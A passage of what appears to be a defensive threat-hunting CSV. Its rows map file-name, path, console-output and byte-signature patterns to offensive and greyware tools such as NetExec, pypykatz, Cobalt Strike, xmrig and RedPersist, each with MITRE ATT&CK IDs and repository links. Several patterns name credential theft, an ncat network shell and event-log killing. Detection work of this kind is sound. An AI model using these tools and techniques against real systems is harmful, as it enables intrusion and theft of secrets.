- TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*\whatlicense-main\*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*\WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*\while_dll_ms*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\whoami.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\Windows\Prefetch\PSEXEC*","greyware_tool_keyword","psexec","Adversaries may place the PsExec executable in the temp directory and execute it from there as part of their offensive activities. By doing so. they can leverage PsExec to execute commands or launch processes on remote systems. enabling lateral movement. privilege escalation. or the execution of malicious payloads.","T1047 - T1105 - T1204","TA0003 - TA0008 - TA0040","N/A","N/A","Lateral movement","https://learn.microsoft.com/fr-fr/sysinternals/downloads/psexec","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*\Windows\Tasks\Certipy*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*\Windows\Tasks\p4yl0ad*","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","108","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" +"*\Windows\Temp\creds.db*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"*\windows\temp\ncat.exe -nv *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*\windows\temp\pwned.trx*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*\Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*\WindowsShareFinder.cs*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*\Win-PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*\WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\winscp_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\WiperPoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*\wireless.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\wl_log.txt*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*\wl-lic.exe*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*\wl-lic.pdb*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*\wmi_1.dll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*\wmi_2.dll*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*\WritebleRegistryKeys.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\ws-dirs.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\ws-files.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\WSPCoerce.cs*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" +"*\x44\x8b\x01\x44\x39\x42*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*\x64\Release\indirect.exe *","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*\x8b\x31\x39\x72\x10\x75*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*\xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig.exe*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig-6.20.0*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\xmrig-master*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*\XOR_b64_encrypted\*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*\xorencrypt.py*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*\ysoserial\*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*\zerologon.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*] Eventviewer Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Extension Hijacking Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Found non-ASCII service: *","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*] Powershell Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Screensaver Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] Startup Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*] UserInitMprLogonScript Persistence created*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.csv*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_adAclOutput*.xlsx*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*_backdoor.exe*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*_backdoor.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_BloodHound.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*_cobaltstrike*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*_dcsync.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*_dns_hijack/*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*_dns_hijack/*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*_dump_users.lst*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*_enum_vault_creds*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*_EvilClippy.*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" +"*_execve_binsh.s*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*_find_sharpgen_dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*_generate_bind_payloads_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*_generate_scramblesuit_passwd*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*_GetNetLoggedon.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*_lfi_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a 